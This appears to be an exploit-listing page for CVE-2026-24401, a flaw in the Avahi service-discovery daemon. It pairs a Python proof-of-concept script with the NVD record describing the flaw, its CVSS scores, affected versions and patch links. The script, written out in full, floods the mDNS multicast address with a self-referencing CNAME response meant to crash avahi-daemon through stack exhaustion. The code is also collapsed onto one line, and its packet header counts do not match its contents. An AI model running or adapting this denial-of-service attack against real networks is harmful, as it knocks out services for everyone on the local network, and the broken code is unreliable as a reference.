CVE-2026-24401

import socket import struct import time # mDNS constants MDNS_MULTICAST_IP = "224.0.0.251" MDNS_PORT = 5353 def create_mdns_header(transaction_id): """Create mDNS header""" return struct.pack('>HHHH', transaction_id, 0x8400, 1, 0) def create_cname_record(name): """Create a CNAME record that points to itself (recursive CNAME)""" name_bytes = b'' for part in name.split('.'): name_bytes += struct.pack('B', len(part)) + part.encode() name_bytes += b'\x00' # Null terminator # CNAME record: name + type(CNAME=5) + class(IN=1) + ttl + rdlength + rdata return name_bytes + struct.pack('>HHIH', 5, 0x0001, 300, len(name_bytes)) + name_bytes def send_malicious_mdns_response(target_ip, recursive_cname): """ Send malicious mDNS response with recursive CNAME record to trigger CVE-2026-24401 """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.settimeout(5) transaction_id = 0x1234 header = create_mdns_header(transaction_id) # Questions section (empty for response) questions = b'' # Answers section with recursive CNAME answers = create_cname_record(recursive_cname) # Additional records section (optional) additional = b'' dns_packet = header + questions + answers + additional # Send to mDNS multicast address sock.sendto(dns_packet, (MDNS_MULTICAST_IP, MDNS_PORT)) print(f"[+] Sent malicious mDNS response with recursive CNAME: {recursive_cname}") print(f"[+] Packet size: {len(dns_packet)} bytes") sock.close() if __name__ == "__main__": print("CVE-2026-24401 PoC - Avahi recursive CNAME DoS") print("=" * 50) # Target: any local hostname that will be queried target_hostname = "h.local" # Send multiple packets to increase likelihood of triggering the bug for i in range(5): send_malicious_mdns_response(MDNS_MULTICAST_IP, target_hostname) time.sleep(0.1) print("[+] Attack completed. Target avahi-daemon should crash.")

{"cve": {"id": "CVE-2026-24401", "sourceIdentifier": "[email protected]", "published": "2026-01-24T02:15:48.760", "lastModified": "2026-02-12T15:58:27.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Avahi is a system which facilitates service discovery on a local network via the mDNS/DNS-SD protocol suite. In versions 0.9rc2 and below, avahi-daemon can be crashed via a segmentation fault by sending an unsolicited mDNS response containing a recursive CNAME record, where the alias and canonical name point to the same domain (e.g., \"h.local\" as a CNAME for \"h.local\"). This causes unbounded recursion in the lookup_handle_cname function, leading to stack exhaustion. The vulnerability affects record browsers where AVAHI_LOOKUP_USE_MULTICAST is set explicitly, which includes record browsers created by resolvers used by nss-mdns. This issue is patched in commit 78eab31128479f06e30beb8c1cbf99dd921e2524."}, {"lang": "es", "value": "Avahi es un sistema que facilita el descubrimiento de servicios en una red local a través de la suite de protocolos mDNS/DNS-SD. En las versiones 0.9rc2 e inferiores, avahi-daemon puede ser bloqueado mediante un fallo de segmentación al enviar una respuesta mDNS no solicitada que contenga un registro CNAME recursivo, donde el alias y el nombre canónico apuntan al mismo dominio (por ejemplo, 'h.local' como CNAME para 'h.local'). Esto causa una recursión ilimitada en la función lookup_handle_cname, lo que lleva al agotamiento de la pila. La vulnerabilidad afecta a los navegadores de registros donde AVAHI_LOOKUP_USE_MULTICAST está configurado explícitamente, lo que incluye los navegadores de registros creados por los resolvedores utilizados por nss-mdns. Este problema está parcheado en el commit 78eab31128479f06e30beb8c1cbf99dd921e2524."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-674"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:avahi:avahi:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.9", "matchCriteriaId": "6481267F-934F-4A0C-9B25-59738E798458"}, {"vulnerable": true, "criteria": "cpe:2.3:a:avahi:avahi:0.9:rc1:*:*:*:*:*:*", "matchCriteriaId": "76971590-AEED-4CB1-B7B7-45EA8FD11524"}, {"vulnerable": true, "criteria": "cpe:2.3:a:avahi:avahi:0.9:rc2:*:*:*:*:*:*", "matchCriteriaId": "83D94AE4-46AC-4955-BB0D-193CF79149A1"}]}]}], "references": [{"url": "https://github.com/avahi/avahi/commit/78eab31128479f06e30beb8c1cbf99dd921e2524", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/avahi/avahi/issues/501", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/avahi/avahi/security/advisories/GHSA-h4vp-5m8j-f6w3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}